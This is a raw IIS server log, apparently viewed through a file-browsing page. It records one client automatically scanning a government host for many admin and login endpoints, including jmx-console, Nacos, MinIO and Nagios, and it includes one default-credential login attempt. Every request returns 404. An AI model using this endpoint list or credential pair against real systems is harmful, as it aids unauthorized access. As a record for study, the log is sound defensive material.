????
Current Path : C:/inetpub/logs/wmsvc/W3SVC1/ |
Current File : C:/inetpub/logs/wmsvc/W3SVC1/ex241212.log |
#Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-12-12 00:00:53 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-12-12 00:00:52 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 32 2024-12-12 00:01:56 103.153.214.94 POST /hmc/j_security_check - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.4.27 - 404 7 0 67 2024-12-12 00:01:57 103.153.214.94 POST /res/j_security_check - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:101.0)+Gecko/20100101+Firefox/101.0 - 404 7 0 64 2024-12-12 00:10:13 103.153.214.94 GET /login - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 59 2024-12-12 00:20:54 103.153.214.94 POST /ibmmq/console/j_security_check - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.9.25 https://bcvt.kontum.gov.vn:8172/ibmmq/console/login.html 404 7 0 48 2024-12-12 00:20:54 103.153.214.94 POST /ibmmq/console/j_security_check - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.1 https://bcvt.kontum.gov.vn:8172/ibmmq/console/login.html 404 7 0 34 2024-12-12 00:20:54 103.153.214.94 POST /ibmmq/console/j_security_check - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.5.23 https://bcvt.kontum.gov.vn:8172/ibmmq/console/login.html 404 7 0 50 2024-12-12 00:21:30 103.153.214.94 POST /0/Authenticate - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 34 2024-12-12 00:21:40 103.153.214.94 POST /data/login - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12_2_8;+en)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.2+Safari/605.1.15 - 404 7 0 32 2024-12-12 00:25:41 103.153.214.94 POST /sess-bin/login_handler.cgi - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.13;+rv:70.0)+Gecko/20100101+Firefox/70.0 https://bcvt.kontum.gov.vn:8172/sess-bin/login_session.cgi 404 7 0 39 2024-12-12 00:26:56 103.153.214.94 GET /login - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 90 2024-12-12 00:30:28 103.153.214.94 GET /sites/web_vhost_domain_list.php - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/index.php 404 7 0 42 2024-12-12 00:30:28 103.153.214.94 GET /sites/web_vhost_domain_list.php - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.61+Safari/537.36 https://bcvt.kontum.gov.vn:8172/index.php 404 7 0 42 2024-12-12 00:30:28 103.153.214.94 GET /login - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:109.0)+Gecko/20100101+Firefox/117.0 - 404 7 0 40 2024-12-12 00:30:28 103.153.214.94 POST /login/index.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11)+AppleWebKit/618.31.14+(KHTML,+like+Gecko)+Version/17.7+Safari/618.31.14 https://bcvt.kontum.gov.vn:8172/login/ 404 7 0 40 2024-12-12 00:30:28 103.153.214.94 GET /login - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/94.0.4606.81+Safari/537.36 - 404 7 0 40 2024-12-12 00:30:28 103.153.214.94 GET /login - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/113.0.0.0+Safari/537.36 - 404 7 0 38 2024-12-12 00:30:28 103.153.214.94 GET /sites/web_vhost_domain_list.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11_0_0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/87.0.4280.88+Safari/537.36 https://bcvt.kontum.gov.vn:8172/index.php 404 7 0 56 2024-12-12 00:30:28 103.153.214.94 POST /login/index.php - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/login/ 404 7 0 58 2024-12-12 00:30:28 103.153.214.94 POST /login/index.php - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:50.0)+Gecko/20100101+Firefox/50.0 https://bcvt.kontum.gov.vn:8172/login/ 404 7 0 72 2024-12-12 00:31:12 103.153.214.94 POST /content.php - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 66 2024-12-12 00:34:16 103.153.214.94 GET /jbpm-console/app/tasks.jsf - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 36 2024-12-12 00:34:16 103.153.214.94 GET /jbpm-console/app/tasks.jsf - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 60 2024-12-12 00:34:16 103.153.214.94 GET /jbpm-console/app/tasks.jsf - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/117.0.0.0+Safari/537.36 - 404 7 0 65 2024-12-12 00:34:16 103.153.214.94 POST /jbpm-console/app/j_security_check - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 35 2024-12-12 00:34:16 103.153.214.94 GET /jbpm-console/app/tasks.jsf - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.8.24 - 404 7 0 33 2024-12-12 00:34:16 103.153.214.94 GET /jbpm-console/app/tasks.jsf - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 33 2024-12-12 00:34:16 103.153.214.94 POST /jbpm-console/app/j_security_check - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.21 - 404 7 0 34 2024-12-12 00:34:16 103.153.214.94 GET /jbpm-console/app/tasks.jsf - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 35 2024-12-12 00:34:16 103.153.214.94 GET /jbpm-console/app/tasks.jsf - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 32 2024-12-12 00:34:16 103.153.214.94 POST /jbpm-console/app/j_security_check - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 60 2024-12-12 00:34:16 103.153.214.94 POST /jbpm-console/app/j_security_check - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 60 2024-12-12 00:34:16 103.153.214.94 GET /jbpm-console/app/tasks.jsf - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.8.22 - 404 7 0 60 2024-12-12 00:46:22 103.153.214.94 POST /Users/authenticatebyname - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:84.0)+Gecko/20100101+Firefox/84.0 - 404 7 0 37 2024-12-12 00:46:22 103.153.214.94 POST /Users/authenticatebyname - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 60 2024-12-12 00:46:22 103.153.214.94 POST /Users/authenticatebyname - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.2.22 - 404 7 0 30 2024-12-12 00:46:22 103.153.214.94 POST /Users/authenticatebyname - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.79+Safari/537.36+Edge/14.14393 - 404 7 0 31 2024-12-12 00:46:22 103.153.214.94 POST /Users/authenticatebyname - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:97.0)+Gecko/20100101+Firefox/97.0 - 404 7 0 32 2024-12-12 00:46:22 103.153.214.94 POST /Users/authenticatebyname - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 37 2024-12-12 00:46:22 103.153.214.94 POST /Users/authenticatebyname - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 45 2024-12-12 00:46:22 103.153.214.94 POST /Users/authenticatebyname - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 44 2024-12-12 00:46:22 103.153.214.94 POST /Users/authenticatebyname - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/93.0.4577.0+Safari/537.36 - 404 7 0 55 2024-12-12 00:46:22 103.153.214.94 POST /Users/authenticatebyname - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.13;+rv:71.0)+Gecko/20100101+Firefox/71.0 - 404 7 0 56 2024-12-12 00:46:22 103.153.214.94 POST /Users/authenticatebyname - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 56 2024-12-12 00:46:22 103.153.214.94 POST /Users/authenticatebyname - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.4.20 - 404 7 0 68 2024-12-12 00:47:21 103.153.214.94 POST /c6/Jhsoft.Web.login/AjaxForLogin.aspx - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 35 2024-12-12 00:47:30 103.153.214.94 POST /hub/login next 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 40 2024-12-12 00:47:30 103.153.214.94 POST /hub/login next 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.21 - 404 7 0 39 2024-12-12 00:50:56 103.153.214.94 POST /lucee/admin/web.cfm - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.79+Safari/537.36+Edge/14.14393 - 404 7 0 48 2024-12-12 00:50:56 103.153.214.94 GET /login login=lutron&password=lutron 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:103.0)+Gecko/20100101+Firefox/103.0 - 404 7 0 37 2024-12-12 00:51:03 103.153.214.94 POST / - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.0.0+Safari/537.36 - 404 7 0 55 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-12-12 01:07:08 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-12-12 01:07:08 103.153.214.94 POST /minio/webrpc - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 42 2024-12-12 01:07:08 103.153.214.94 POST /minio/webrpc - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:88.0)+Gecko/20100101+Firefox/88.0 - 404 7 0 32 2024-12-12 01:07:21 103.153.214.94 GET /jmx-console/ - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.3.27 - 404 7 0 45 2024-12-12 01:07:21 103.153.214.94 GET /jmx-console/ - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/115.0.0.0+Safari/537.36 - 404 7 0 33 2024-12-12 01:07:21 103.153.214.94 GET /jmx-console/ - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.7+Safari/537.36 - 404 7 0 32 2024-12-12 01:07:21 103.153.214.94 GET /jmx-console/ - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/116.0 - 404 7 0 30 2024-12-12 01:07:21 103.153.214.94 GET /jmx-console/ - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:95.0)+Gecko/20100101+Firefox/95.0 - 404 7 0 33 2024-12-12 01:07:21 103.153.214.94 GET /jmx-console/ - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.4.25 - 404 7 0 31 2024-12-12 01:07:21 103.153.214.94 GET /jmx-console/ - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 31 2024-12-12 01:07:21 103.153.214.94 GET /jmx-console/ - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:109.0)+Gecko/20100101+Firefox/117.0 - 404 7 0 32 2024-12-12 01:07:21 103.153.214.94 GET /jmx-console/ - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.61+Safari/537.36 - 404 7 0 37 2024-12-12 01:07:21 103.153.214.94 GET /jmx-console/ - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/110.0 - 404 7 0 41 2024-12-12 01:07:21 103.153.214.94 GET /jmx-console/ - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 42 2024-12-12 01:07:21 103.153.214.94 GET /jmx-console/ - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 40 2024-12-12 01:07:21 103.153.214.94 GET /jmx-console/ - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 36 2024-12-12 01:07:21 103.153.214.94 GET /jmx-console/ - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.15 - 404 7 0 36 2024-12-12 01:07:21 103.153.214.94 GET /jmx-console/ - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 38 2024-12-12 01:07:21 103.153.214.94 GET /jmx-console/ - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 37 2024-12-12 01:07:21 103.153.214.94 GET /jmx-console/ - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 38 2024-12-12 01:07:21 103.153.214.94 GET /jmx-console/ - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 38 2024-12-12 01:07:21 103.153.214.94 GET /jmx-console/ - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 39 2024-12-12 01:07:21 103.153.214.94 GET /jmx-console/ - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.2.22 - 404 7 0 47 2024-12-12 01:07:21 103.153.214.94 GET /jmx-console/ - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 47 2024-12-12 01:07:21 103.153.214.94 GET /jmx-console/ - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 54 2024-12-12 01:07:21 103.153.214.94 GET /jmx-console/ - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 53 2024-12-12 01:07:21 103.153.214.94 GET /jmx-console/ - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0+Safari/605.5.20 - 404 7 0 54 2024-12-12 01:07:21 103.153.214.94 GET /jmx-console/ - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 71 2024-12-12 01:07:32 103.153.214.94 GET /jmx-console/ - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 38 2024-12-12 01:07:32 103.153.214.94 GET /jmx-console/ - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:102.0)+Gecko/20100101+Firefox/102.0 - 404 7 0 48 2024-12-12 01:07:32 103.153.214.94 GET /jmx-console/ - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 54 2024-12-12 01:08:51 103.153.214.94 POST /core/ajax/user.ajax.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 115 2024-12-12 01:09:03 103.153.214.94 GET /index.php v=d&p=dashboard 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0+Safari/605.1.15 - 404 7 0 39 2024-12-12 01:10:00 103.153.214.94 POST /cgi-bin/luci/ - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 34 2024-12-12 01:10:29 103.153.214.94 POST /nacos/v1/auth/users/login - 8172 - 206.238.196.225 Nacos-Server - 404 7 0 107 2024-12-12 01:10:29 103.153.214.94 POST /v1/auth/users/login - 8172 - 206.238.196.225 Nacos-Server - 404 7 0 105 2024-12-12 01:13:10 103.153.214.94 GET /nagios/side.php - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 35 2024-12-12 01:13:10 103.153.214.94 GET /nagios/side.php - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 55 2024-12-12 01:14:16 103.153.214.94 GET / controller=AuthController&action=login 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:68.0)+Gecko/20100101+Firefox/68.0 - 404 7 0 44 2024-12-12 01:16:26 103.153.214.94 GET /.magnolia/admincentral - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.4.18 - 404 7 0 42 2024-12-12 01:16:28 103.153.214.94 GET /login_password_page.php - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:79.0)+Gecko/20100101+Firefox/79.0 - 404 7 0 35 2024-12-12 01:17:18 103.153.214.94 POST /netflow/jspui/j_security_check - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:109.0)+Gecko/20100101+Firefox/117.0 - 404 7 0 52 2024-12-12 01:17:18 103.153.214.94 POST /login - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 45 2024-12-12 01:19:53 103.153.214.94 POST /webadmin/index.php - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 62 2024-12-12 01:28:19 103.153.214.94 POST /auth/token - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 45 2024-12-12 01:28:19 103.153.214.94 POST /api/tokens - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 44 2024-12-12 01:28:19 103.153.214.94 POST /service/rapture/session - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.3.26 - 404 7 0 63 2024-12-12 01:28:19 103.153.214.94 POST /login - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.6.1+Safari/605.1.15 - 404 7 0 40 2024-12-12 01:30:29 103.153.214.94 GET /control/userimage.html - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 61 2024-12-12 01:30:31 103.153.214.94 POST /api/v1/login - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 42 2024-12-12 01:30:40 103.153.214.94 GET /control/userimage.html - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 58 2024-12-12 01:30:43 103.153.214.94 GET /api/v1/session - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 31 2024-12-12 01:30:46 103.153.214.94 POST /login/verify - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 bcvt.kontum.gov.vn:8172/login/index 404 7 0 84 2024-12-12 01:30:46 103.153.214.94 POST /user/login/login - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 42 2024-12-12 01:30:48 103.153.214.94 GET /user/main - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/user/login/ 404 7 0 39 2024-12-12 01:30:53 103.153.214.94 POST /x_organization_assemble_authentication/jaxrs/authentication/captcha - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/92.0.4515.159+Safari/537.36 - 404 7 0 35 2024-12-12 01:33:27 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 33 2024-12-12 01:33:38 103.153.214.94 POST /j_spring_security_check - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_5)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 404 7 0 39 2024-12-12 01:33:48 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 120 2024-12-12 01:36:17 103.153.214.94 GET /nagiosxi/login.php - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 43 2024-12-12 01:44:59 103.153.214.94 POST /control/login - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11_2_3)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17+Safari/605.1.15 - 404 7 0 51 2024-12-12 01:45:04 103.153.214.94 POST /interface/main/main_screen.php auth=login&site=default 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.2.22 - 404 7 0 47 2024-12-12 01:47:21 103.153.214.94 POST /rpc.php - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 146 2024-12-12 01:50:35 103.153.214.94 